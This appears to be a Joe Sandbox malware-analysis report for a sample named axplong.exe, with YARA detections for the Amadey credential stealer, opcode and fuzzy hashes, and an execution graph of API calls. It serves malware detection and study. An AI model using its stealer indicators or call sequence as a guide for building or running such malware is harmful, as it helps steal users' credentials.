                          File size:1'913'344 bytes
                          MD5 hash:EE97C42201B1BF6C1B166B5EF8EE88B0
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.1759465892.0000000004A80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1799745219.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:6
                          Start time:11:06:00
                          Start date:26/09/2024
                          Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Imagebase:0x2b0000
                          File size:1'913'344 bytes
                          MD5 hash:EE97C42201B1BF6C1B166B5EF8EE88B0
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000003.2268716495.0000000004A80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:false

                          Disassembly

                          Reset < >

                            Executed Functions

                            Function 04BA02BB Relevance: .1, Instructions: 73COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770091601.0000000004BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_4ba0000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b80e07321de0b92f6df37930872d6708e97c4eecfc20e94f169680eb408abb59
                            • Instruction ID: 5bbb1488c2621ccf3abd4a7cd86df9681aba4bf0a75225c996c934274a176918
                            • Opcode Fuzzy Hash: b80e07321de0b92f6df37930872d6708e97c4eecfc20e94f169680eb408abb59
                            • Instruction Fuzzy Hash: B90175E634D210FF6042AD49575057626AAE5DF270F7080D6B007D9642F6956E757021
                            Function 04BA02D8 Relevance: .1, Instructions: 97COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770091601.0000000004BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_4ba0000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a37f2d4f011a4d81a703b9018ad8333eb2d5e544d3136277a8f8104515632a84
                            • Instruction ID: 8928fcef01f8a30b17c9db13c00cabc0001dac5c1ead8336cbb59fd67074cf3d
                            • Opcode Fuzzy Hash: a37f2d4f011a4d81a703b9018ad8333eb2d5e544d3136277a8f8104515632a84
                            • Instruction Fuzzy Hash: B8116AA370D240FFA242AE4456545B57BB9FADF230B3080DBF043CE543F6596A75B122
                            Function 04BA02CC Relevance: .1, Instructions: 74COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770091601.0000000004BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_4ba0000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6d72d20b073ab5bed5fbf5b1085cc5fde9ad9ff6ff0867c2df269ac40f0447c9
                            • Instruction ID: a5dcc09b3f5cdc151d6efde549ddaccb6b2bf992261ee1a36cb5572fe59b81a4
                            • Opcode Fuzzy Hash: 6d72d20b073ab5bed5fbf5b1085cc5fde9ad9ff6ff0867c2df269ac40f0447c9
                            • Instruction Fuzzy Hash: 4601D8E734D210FF6042AD4957505B626AEF5DF230F70C0D6F007D9A42F6956EB57022
                            Function 04BA02EF Relevance: .1, Instructions: 73COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770091601.0000000004BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_4ba0000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: aad3240f1caaf524bb3cdb468578f0edfad75883ba303a18af41aaec0230bd0f
                            • Instruction ID: b2880d1171078535a145ce713b4fabea5a80dd32fb46bf8153b43badaeeb5a0d
                            • Opcode Fuzzy Hash: aad3240f1caaf524bb3cdb468578f0edfad75883ba303a18af41aaec0230bd0f
                            • Instruction Fuzzy Hash: F401D4B734D100FF6052AE4557505BA26AAFADF630B30C0E6F047D9A43F6A56EB67022
                            Function 04BA030F Relevance: .1, Instructions: 67COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770091601.0000000004BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_4ba0000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ea5d9704f52f1d8b227131e0121201aa88f1e4901e51670ceccddbb39cbb862b
                            • Instruction ID: e269c44e9bff5553aad2f8a5ef35b2b37ee8a2128615dc33f1e2c62383d8b735
                            • Opcode Fuzzy Hash: ea5d9704f52f1d8b227131e0121201aa88f1e4901e51670ceccddbb39cbb862b
                            • Instruction Fuzzy Hash: F301F9B630D241EFE202AA4857149763BA5EADB230B3084E6F003D6543E6559DA57121
                            Function 04BA038C Relevance: .1, Instructions: 65COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770091601.0000000004BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_4ba0000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cd3d190905ac209afe6ca4a2903f65e4fd4f3bf4e7993312564a214480e8f943
                            • Instruction ID: 0b56bf46feada47464cc9cdec38200fa0544697ba2f5ac087d2d8b5a1841bba2
                            • Opcode Fuzzy Hash: cd3d190905ac209afe6ca4a2903f65e4fd4f3bf4e7993312564a214480e8f943
                            • Instruction Fuzzy Hash: DEF022E734D010BE6016FD856A586F62ABAE1DF670630C496F043D4903B545AEFA3021
                            Function 04BA0372 Relevance: .1, Instructions: 64COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770091601.0000000004BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_4ba0000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: acb747c8595e5631cadc74c63073d37cae507ef7208f570301ed78fd328e784a
                            • Instruction ID: 828b87d82e9dbe90a9b6b16e1975c20b97c0e4b72def9c8b4993d394132cae1e
                            • Opcode Fuzzy Hash: acb747c8595e5631cadc74c63073d37cae507ef7208f570301ed78fd328e784a
                            • Instruction Fuzzy Hash: 4FF081A734D111BF6052AD4927545B62AA9F5EE670B30C0A6F007DA503F5896EBA7021
                            Function 04BA035C Relevance: .1, Instructions: 58COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770091601.0000000004BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_4ba0000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e4625f6d0dacecb93b0e8105dcf4ddec6340aaebee05d0cb450af0617fea904a
                            • Instruction ID: ae3c2653f34ef330c8caf2befef429a58817ffa6d58c192e8d4cf33af38c4ca6
                            • Opcode Fuzzy Hash: e4625f6d0dacecb93b0e8105dcf4ddec6340aaebee05d0cb450af0617fea904a
                            • Instruction Fuzzy Hash: 03F0E9EB74D110BE6051F98567586BA2A6AF5DF670730C4A6F003D4543B5859EFA3031
                            Function 04BA034A Relevance: .1, Instructions: 55COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770091601.0000000004BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_4ba0000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5e9fee2021bf5f30b64663c69af3ee3794b823289d1ffd8503b172c0fedc6575
                            • Instruction ID: 090af0c36cc5ac9fc8e942199c928f34d3f914e770611cf73ece37938ea70b8e
                            • Opcode Fuzzy Hash: 5e9fee2021bf5f30b64663c69af3ee3794b823289d1ffd8503b172c0fedc6575
                            • Instruction Fuzzy Hash: A4F0B4E770D111BE6051AD4527545BA2679F5DE770B30C0A6F003D9643F6895EBA3032
                            Function 04BA039F Relevance: .0, Instructions: 40COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770091601.0000000004BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_4ba0000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cbc0df79a76349a151e9fc38d56fd467a2a1d23b2a17eafb08a6d46025d939d7
                            • Instruction ID: 8e0910a3b0c6b8bea0477a694177f665b7a5ec0eb46eda9dac56be692fcc4f55
                            • Opcode Fuzzy Hash: cbc0df79a76349a151e9fc38d56fd467a2a1d23b2a17eafb08a6d46025d939d7
                            • Instruction Fuzzy Hash: 3EE02BF774D1106EA102A98962644B83B7DF4DB270370C0E6F003DA543F9495FE66131
                            Function 04BA03BC Relevance: .0, Instructions: 28COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770091601.0000000004BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_4ba0000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 182425c78adb3f662c626bf941be1760ff00c7bde0b8fc148b16641792580af4
                            • Instruction ID: 60c7c023cf5efeb91a22f12d0359a8a634dae4f4e1528103de038b020cc2345b
                            • Opcode Fuzzy Hash: 182425c78adb3f662c626bf941be1760ff00c7bde0b8fc148b16641792580af4
                            • Instruction Fuzzy Hash: 7DE0E7E774C1007640427D4C12455F43F75B5DB231330C0E5F0038494378495AF6B121

                            Non-executed Functions

                            Function 04BA0816 Relevance: .2, Instructions: 184COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770091601.0000000004BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_4ba0000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 22466fd5d5d1d7560a264c350624eda575266a12cac2643d03e13e7faf0a83db
                            • Instruction ID: a2baf7b0dd09c37dce1ea94ca0a074c481138ad20f6ec81526219798f91f3322
                            • Opcode Fuzzy Hash: 22466fd5d5d1d7560a264c350624eda575266a12cac2643d03e13e7faf0a83db
                            • Instruction Fuzzy Hash: A53128E774C110EDB115FD4587516FA2A9EE3E7730F3041A6B007C6602F2957A7A3066

                            Execution Graph

                            Execution Coverage:7.2%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:5.9%
                            Total number of Nodes:546
                            Total number of Limit Nodes:31
                            execution_graph 12248 2e6beb 12253 2e6bf7 12248->12253 12250 2e6c26 12251 2e6c35 12250->12251 12252 2e6c43 12250->12252 12254 2e6c99 6 API calls 12251->12254 12266 2e68bd 12252->12266 12260 2e8aaf 12253->12260 12256 2e6c3f 12254->12256 12257 2e6c5d 12259 2e6c71 ___free_lconv_mon 12257->12259 12269 2e6c99 12257->12269 12261 2e8ab4 __fassign 12260->12261 12264 2e8abf 12261->12264 12281 2ed4f4 12261->12281 12278 2e651d 12264->12278 12265 2e8af2 __dosmaperr __fassign 12265->12250 12298 2e683a 12266->12298 12268 2e68cf 12268->12257 12270 2e6cc4 __cftof 12269->12270 12275 2e6ca7 __cftof __dosmaperr 12269->12275 12271 2e6d06 CreateFileW 12270->12271 12277 2e6cea __cftof __dosmaperr 12270->12277 12272 2e6d2a 12271->12272 12273 2e6d38 12271->12273 12334 2e6e01 GetFileType 12272->12334 12346 2e6d77 12273->12346 12275->12259 12277->12259 12286 2e63f7 12278->12286 12282 2ed500 __fassign 12281->12282 12283 2e651d __fassign 2 API calls 12282->12283 12284 2ed55c __cftof __dosmaperr __fassign 12282->12284 12285 2ed6ee __dosmaperr __fassign 12283->12285 12284->12264 12285->12264 12287 2e6405 __fassign 12286->12287 12288 2e6450 12287->12288 12291 2e645b 12287->12291 12288->12265 12296 2ea1c2 GetPEB 12291->12296 12293 2e6465 12294 2e646a GetPEB 12293->12294 12295 2e647a __fassign 12293->12295 12294->12295 12297 2ea1dc __fassign 12296->12297 12297->12293 12299 2e685a 12298->12299 12303 2e6851 12298->12303 12299->12303 12304 2eb4bb 12299->12304 12303->12268 12305 2eb4ce 12304->12305 12306 2e6890 12304->12306 12305->12306 12312 2ef46b 12305->12312 12308 2eb4e8 12306->12308 12309 2eb4fb 12308->12309 12310 2eb510 12308->12310 12309->12310 12317 2ee571 12309->12317 12310->12303 12314 2ef477 __fassign 12312->12314 12313 2ef4c6 12313->12306 12314->12313 12315 2e8aaf __fassign 2 API calls 12314->12315 12316 2ef4eb 12315->12316 12318 2ee57b 12317->12318 12321 2ee489 12318->12321 12320 2ee581 12320->12310 12325 2ee495 __fassign ___free_lconv_mon 12321->12325 12322 2ee4b6 12322->12320 12323 2e8aaf __fassign 2 API calls 12324 2ee528 12323->12324 12326 2ee564 12324->12326 12330 2ea5ee 12324->12330 12325->12322 12325->12323 12326->12320 12331 2ea611 12330->12331 12332 2e8aaf __fassign 2 API calls 12331->12332 12333 2ea687 12332->12333 12335 2e6e3c __cftof 12334->12335 12345 2e6ed2 __dosmaperr 12334->12345 12336 2e6e75 GetFileInformationByHandle 12335->12336 12335->12345 12337 2e6e8b 12336->12337 12336->12345 12351 2e70c9 12337->12351 12341 2e6ea8 12342 2e6f71 SystemTimeToTzSpecificLocalTime 12341->12342 12343 2e6ebb 12342->12343 12344 2e6f71 SystemTimeToTzSpecificLocalTime 12343->12344 12344->12345 12345->12277 12347 2e6d85 12346->12347 12348 2e6d8a __dosmaperr 12347->12348 12349 2e70c9 2 API calls 12347->12349 12348->12277 12350 2e6da3 12349->12350 12350->12277 12353 2e70df _wcsrchr 12351->12353 12352 2e6e97 12361 2e6f71 12352->12361 12353->12352 12365 2eb9e4 12353->12365 12355 2e7123 12355->12352 12356 2eb9e4 2 API calls 12355->12356 12357 2e7134 12356->12357 12357->12352 12358 2eb9e4 2 API calls 12357->12358 12359 2e7145 12358->12359 12359->12352 12360 2eb9e4 2 API calls 12359->12360 12360->12352 12362 2e6f89 12361->12362 12363 2e6fa9 SystemTimeToTzSpecificLocalTime 12362->12363 12364 2e6f8f 12362->12364 12363->12364 12364->12341 12366 2eb9f2 12365->12366 12369 2eb9f8 __cftof __dosmaperr 12366->12369 12370 2eba2d 12366->12370 12368 2eba28 12368->12355 12369->12355 12371 2eba3d __cftof __dosmaperr 12370->12371 12372 2eba57 12370->12372 12371->12368 12372->12371 12373 2e683a __fassign 2 API calls 12372->12373 12374 2eba81 12373->12374 12374->12371 12375 2eb9a5 GetPEB GetPEB 12374->12375 12375->12374 12884 2cb7e9 12885 2cb6e5 8 API calls 12884->12885 12887 2cb811 Concurrency::details::_Reschedule_chore 12885->12887 12886 2cb836 12889 2cb648 8 API calls 12886->12889 12887->12886 12891 2ccade 12887->12891 12890 2cb84e 12889->12890 12892 2ccafc 12891->12892 12893 2ccaec TpCallbackUnloadDllOnCompletion 12891->12893 12892->12886 12893->12892 12477 2b7400 12478 2b7435 shared_ptr 12477->12478 12482 2b752f shared_ptr 12478->12482 12483 2cd041 12478->12483 12480 2b75bd 12480->12482 12487 2ccff7 12480->12487 12485 2cd052 12483->12485 12484 2cd05a 12484->12480 12485->12484 12491 2cd0c9 12485->12491 12488 2cd006 12487->12488 12489 2cd0af 12488->12489 12490 2cd0ab RtlWakeAllConditionVariable 12488->12490 12489->12482 12490->12482 12492 2cd0d7 SleepConditionVariableCS 12491->12492 12494 2cd0f0 12491->12494 12492->12494 12494->12485 12586 2c6ae0 12587 2c6b10 12586->12587 12590 2c46c0 12587->12590 12589 2c6b5c Sleep 12589->12587 12593 2c46fb 12590->12593 12605 2c4d80 shared_ptr 12590->12605 12591 2c4e69 shared_ptr 12591->12589 12594 2bbd60 5 API calls 12593->12594 12593->12605 12606 2c4753 shared_ptr __dosmaperr 12594->12606 12595 2c4fee shared_ptr 12626 2b7d00 12595->12626 12596 2c4f25 shared_ptr 12596->12595 12599 2c6ab6 12596->12599 12598 2c4ffd 12632 2b82b0 12598->12632 12601 2c46c0 15 API calls 12599->12601 12604 2c6b5c Sleep 12601->12604 12602 2c4a0d 12603 2bbd60 5 API calls 12602->12603 12602->12605 12608 2c4a72 shared_ptr 12603->12608 12604->12599 12605->12591 12618 2b65b0 12605->12618 12606->12602 12607 2e8979 2 API calls 12606->12607 12607->12602 12608->12605 12611 2c42a0 12608->12611 12610 2c5016 shared_ptr 12610->12589 12612 2c42e2 12611->12612 12614 2c4556 12612->12614 12616 2c4308 shared_ptr 12612->12616 12613 2c4520 shared_ptr 12613->12605 12615 2c3550 13 API calls 12614->12615 12615->12613 12616->12613 12636 2c3550 12616->12636 12619 2b660f 12618->12619 12620 2b2280 2 API calls 12619->12620 12621 2b6699 shared_ptr 12620->12621 12622 2b2280 2 API calls 12621->12622 12623 2b6822 shared_ptr 12621->12623 12624 2b6727 shared_ptr 12622->12624 12623->12596 12624->12623 12625 2b2280 2 API calls 12624->12625 12625->12624 12628 2b7d66 shared_ptr __cftof 12626->12628 12627 2b7ea3 GetNativeSystemInfo 12630 2b7ea7 12627->12630 12628->12627 12629 2b7eb8 shared_ptr 12628->12629 12628->12630 12629->12598 12630->12629 12718 2e8a81 12630->12718 12633 2b8315 shared_ptr __cftof 12632->12633 12634 2b8454 GetNativeSystemInfo 12633->12634 12635 2b8333 12633->12635 12634->12635 12635->12610 12637 2c3b92 shared_ptr std::_Xinvalid_argument 12636->12637 12638 2c358f shared_ptr 12636->12638 12637->12616 12638->12637 12643 2c38f5 shared_ptr __dosmaperr 12638->12643 12649 2baca0 12638->12649 12639 2e8979 2 API calls 12641 2c3a8a 12639->12641 12641->12637 12642 2c3e52 12641->12642 12645 2c3b9d 12641->12645 12647 2c3ab2 12641->12647 12673 2c2e20 12642->12673 12643->12637 12643->12639 12658 2c1dd0 12645->12658 12654 2c07f0 12647->12654 12651 2badf0 __cftof 12649->12651 12650 2bae16 shared_ptr 12650->12643 12651->12650 12691 2b5500 12651->12691 12653 2baf7e 12655 2c0870 __dosmaperr 12654->12655 12656 2e8979 2 API calls 12655->12656 12657 2c0a6d 12656->12657 12661 2c1e6b shared_ptr __dosmaperr 12658->12661 12659 2be440 5 API calls 12660 2c2936 shared_ptr std::_Xinvalid_argument 12659->12660 12660->12637 12661->12660 12662 2e8979 2 API calls 12661->12662 12668 2c1e78 12661->12668 12663 2c2265 shared_ptr 12662->12663 12663->12660 12664 2e66e7 2 API calls 12663->12664 12663->12668 12665 2c268b shared_ptr __dosmaperr 12664->12665 12665->12660 12666 2e8979 2 API calls 12665->12666 12667 2c2759 12666->12667 12667->12660 12667->12668 12669 2c27d1 12667->12669 12668->12659 12670 2be440 5 API calls 12669->12670 12671 2c2843 12670->12671 12671->12660 12672 2b5df0 2 API calls 12671->12672 12672->12660 12675 2c2ec5 shared_ptr __cftof 12673->12675 12679 2c2e64 12673->12679 12674 2be440 5 API calls 12680 2c3423 shared_ptr 12674->12680 12676 2c32de InternetCloseHandle InternetCloseHandle 12675->12676 12677 2c32f2 InternetCloseHandle InternetCloseHandle 12675->12677 12675->12679 12675->12680 12676->12675 12677->12675 12678 2c351a shared_ptr std::_Xinvalid_argument 12678->12637 12679->12674 12680->12678 12682 2baca0 2 API calls 12680->12682 12684 2c38f5 shared_ptr __dosmaperr 12680->12684 12681 2e8979 2 API calls 12683 2c3a8a 12681->12683 12682->12684 12683->12678 12685 2c3e52 12683->12685 12687 2c3b9d 12683->12687 12689 2c3ab2 12683->12689 12684->12678 12684->12681 12686 2c2e20 9 API calls 12685->12686 12686->12678 12688 2c1dd0 9 API calls 12687->12688 12688->12678 12690 2c07f0 2 API calls 12689->12690 12690->12678 12692 2b5520 12691->12692 12694 2b5620 12692->12694 12695 2b2280 12692->12695 12694->12653 12698 2b2240 12695->12698 12699 2b2256 12698->12699 12702 2e8667 12699->12702 12705 2e7456 12702->12705 12704 2b2264 12704->12692 12706 2e7496 12705->12706 12710 2e747e __cftof __dosmaperr 12705->12710 12707 2e683a __fassign 2 API calls 12706->12707 12706->12710 12708 2e74ae 12707->12708 12711 2e7a11 12708->12711 12710->12704 12713 2e7a22 12711->12713 12712 2e7a31 __cftof __dosmaperr 12712->12710 12713->12712 12714 2e7fb5 GetPEB GetPEB 12713->12714 12715 2e7c0f GetPEB GetPEB 12713->12715 12716 2e7c35 GetPEB GetPEB 12713->12716 12717 2e7d83 GetPEB GetPEB 12713->12717 12714->12713 12715->12713 12716->12713 12717->12713 12719 2e86d7 2 API calls 12718->12719 12720 2e8a9f 12719->12720 12720->12629 12721 2c8700 12722 2c875a __cftof 12721->12722 12728 2c9ae0 12722->12728 12724 2c8784 12725 2c879c 12724->12725 12732 2b43b0 12724->12732 12727 2c8809 std::_Throw_future_error 12729 2c9b15 12728->12729 12738 2b2ca0 12729->12738 12731 2c9b46 12731->12724 12733 2cbe0f InitOnceExecuteOnce 12732->12733 12734 2b43ca 12733->12734 12735 2b43d1 12734->12735 12736 2e6beb 6 API calls 12734->12736 12735->12727 12737 2b43e4 12736->12737 12739 2b2cdd 12738->12739 12740 2cbe0f InitOnceExecuteOnce 12739->12740 12741 2b2d06 12740->12741 12742 2b2d11 12741->12742 12743 2b2d48 12741->12743 12747 2cbe27 12741->12747 12742->12731 12754 2b2400 12743->12754 12748 2cbe33 std::_Xinvalid_argument 12747->12748 12749 2cbe9a 12748->12749 12750 2cbea3 12748->12750 12757 2cbdaf 12749->12757 12752 2b2aa0 7 API calls 12750->12752 12753 2cbe9f 12752->12753 12753->12743 12775 2cb506 12754->12775 12756 2b2432 12758 2ccb61 InitOnceExecuteOnce 12757->12758 12759 2cbdc7 12758->12759 12760 2cbdce 12759->12760 12763 2e6beb 12759->12763 12760->12753 12762 2cbdd7 12762->12753 12768 2e6bf7 12763->12768 12764 2e8aaf __fassign 2 API calls 12765 2e6c26 12764->12765 12766 2e6c35 12765->12766 12767 2e6c43 12765->12767 12769 2e6c99 6 API calls 12766->12769 12770 2e68bd 2 API calls 12767->12770 12768->12764 12771 2e6c3f 12769->12771 12772 2e6c5d 12770->12772 12771->12762 12773 2e6c99 6 API calls 12772->12773 12774 2e6c71 ___free_lconv_mon 12772->12774 12773->12774 12774->12762 12776 2cb521 std::_Xinvalid_argument 12775->12776 12777 2e8aaf __fassign 2 API calls 12776->12777 12779 2cb588 __fassign 12776->12779 12778 2cb5cf 12777->12778 12779->12756 12791 2ca140 12792 2ca1c0 12791->12792 12798 2c7040 12792->12798 12794 2ca1fc shared_ptr 12796 2ca3ee shared_ptr 12794->12796 12802 2b3ea0 12794->12802 12797 2ca3d6 12800 2c7081 __cftof __Mtx_init_in_situ 12798->12800 12799 2c72b6 12799->12794 12800->12799 12808 2b2e80 12800->12808 12803 2b3f08 12802->12803 12807 2b3ede 12802->12807 12806 2b3f18 12803->12806 12851 2b2bc0 12803->12851 12806->12797 12807->12797 12809 2b2ec6 12808->12809 12813 2b2f2f 12808->12813 12810 2cc5dc GetSystemTimePreciseAsFileTime 12809->12810 12811 2b2ed2 12810->12811 12814 2b2fde 12811->12814 12818 2b2edd __Mtx_unlock 12811->12818 12812 2b2faf 12812->12799 12813->12812 12819 2cc5dc GetSystemTimePreciseAsFileTime 12813->12819 12815 2cc19a 7 API calls 12814->12815 12816 2b2fe4 12815->12816 12817 2cc19a 7 API calls 12816->12817 12820 2b2f79 12817->12820 12818->12813 12818->12816 12819->12820 12821 2cc19a 7 API calls 12820->12821 12822 2b2f80 __Mtx_unlock 12820->12822 12821->12822 12823 2cc19a 7 API calls 12822->12823 12824 2b2f98 __Cnd_broadcast 12822->12824 12823->12824 12824->12812 12825 2cc19a 7 API calls 12824->12825 12826 2b2ffc 12825->12826 12827 2cc5dc GetSystemTimePreciseAsFileTime 12826->12827 12837 2b3040 shared_ptr __Mtx_unlock 12827->12837 12828 2b3185 12829 2cc19a 7 API calls 12828->12829 12830 2b318b 12829->12830 12831 2cc19a 7 API calls 12830->12831 12832 2b3191 12831->12832 12833 2cc19a 7 API calls 12832->12833 12839 2b3153 __Mtx_unlock 12833->12839 12834 2b3167 12834->12799 12835 2cc19a 7 API calls 12836 2b319d 12835->12836 12837->12828 12837->12830 12837->12834 12838 2cc5dc GetSystemTimePreciseAsFileTime 12837->12838 12840 2b311f 12838->12840 12839->12834 12839->12835 12840->12828 12840->12832 12840->12839 12842 2cbc7c 12840->12842 12845 2cbaa2 12842->12845 12844 2cbc8c 12844->12840 12846 2cbacc 12845->12846 12847 2cce9b _xtime_get GetSystemTimePreciseAsFileTime 12846->12847 12848 2cbad4 __Xtime_diff_to_millis2 12846->12848 12849 2cbaff __Xtime_diff_to_millis2 12847->12849 12848->12844 12849->12848 12850 2cce9b _xtime_get GetSystemTimePreciseAsFileTime 12849->12850 12850->12848 12852 2b2bce 12851->12852 12858 2cb777 12852->12858 12854 2b2c02 12855 2b2c09 12854->12855 12864 2b2c40 12854->12864 12855->12797 12857 2b2c18 std::_Xinvalid_argument 12859 2cb7a3 Concurrency::details::_Reschedule_chore 12858->12859 12860 2cb784 12858->12860 12859->12854 12867 2ccaa7 12860->12867 12862 2cb794 12862->12859 12869 2cb74e 12862->12869 12875 2cb72b 12864->12875 12866 2b2c72 shared_ptr 12866->12857 12868 2ccac2 CreateThreadpoolWork 12867->12868 12868->12862 12870 2cb757 Concurrency::details::_Reschedule_chore 12869->12870 12873 2cccfc 12870->12873 12872 2cb771 12872->12859 12874 2ccd11 TpPostWork 12873->12874 12874->12872 12876 2cb747 12875->12876 12877 2cb737 12875->12877 12876->12866 12877->12876 12879 2cc9a8 12877->12879 12880 2cc9bd TpReleaseWork 12879->12880 12880->12876 12505 2cb85e 12510 2cb6e5 12505->12510 12507 2cb886 12518 2cb648 12507->12518 12509 2cb89f 12511 2cb6f1 Concurrency::details::_Reschedule_chore 12510->12511 12512 2cb722 12511->12512 12528 2cc5dc 12511->12528 12512->12507 12516 2cb70c __Mtx_unlock 12517 2b2ad0 7 API calls 12516->12517 12517->12512 12519 2cb654 Concurrency::details::_Reschedule_chore 12518->12519 12520 2cc5dc GetSystemTimePreciseAsFileTime 12519->12520 12521 2cb6ae 12519->12521 12522 2cb669 12520->12522 12521->12509 12523 2b2ad0 7 API calls 12522->12523 12524 2cb66f __Mtx_unlock 12523->12524 12525 2b2ad0 7 API calls 12524->12525 12526 2cb68c __Cnd_broadcast 12525->12526 12526->12521 12527 2b2ad0 7 API calls 12526->12527 12527->12521 12536 2cc382 12528->12536 12530 2cb706 12531 2b2ad0 12530->12531 12532 2b2ada 12531->12532 12533 2b2adc 12531->12533 12532->12516 12553 2cc19a 12533->12553 12537 2cc3d8 12536->12537 12539 2cc3aa 12536->12539 12537->12539 12542 2cce9b 12537->12542 12539->12530 12540 2cc42d __Xtime_diff_to_millis2 12540->12539 12541 2cce9b _xtime_get GetSystemTimePreciseAsFileTime 12540->12541 12541->12540 12543 2cceb7 __aulldvrm 12542->12543 12544 2cceaa 12542->12544 12543->12540 12544->12543 12546 2cce74 12544->12546 12549 2ccb1a 12546->12549 12550 2ccb2b GetSystemTimePreciseAsFileTime 12549->12550 12551 2ccb37 12549->12551 12550->12551 12551->12543 12554 2cc1c2 12553->12554 12555 2cc1a4 12553->12555 12554->12554 12555->12554 12557 2cc1c7 12555->12557 12560 2b2aa0 12557->12560 12559 2cc1de std::_Xinvalid_argument 12559->12555 12574 2cbe0f 12560->12574 12562 2b2abf 12562->12559 12563 2e8aaf __fassign 2 API calls 12564 2e6c26 12563->12564 12565 2e6c35 12564->12565 12566 2e6c43 12564->12566 12567 2e6c99 6 API calls 12565->12567 12568 2e68bd 2 API calls 12566->12568 12570 2e6c3f 12567->12570 12571 2e6c5d 12568->12571 12569 2b2ab4 12569->12562 12569->12563 12570->12559 12572 2e6c99 6 API calls 12571->12572 12573 2e6c71 ___free_lconv_mon 12571->12573 12572->12573 12573->12559 12577 2ccb61 12574->12577 12578 2ccb6f InitOnceExecuteOnce 12577->12578 12580 2cbe22 12577->12580 12578->12580 12580->12569 12881 2e6559 12882 2e63f7 __fassign 2 API calls 12881->12882 12883 2e656a 12882->12883 12786 2e6974 12787 2e698c 12786->12787 12788 2e6982 12786->12788 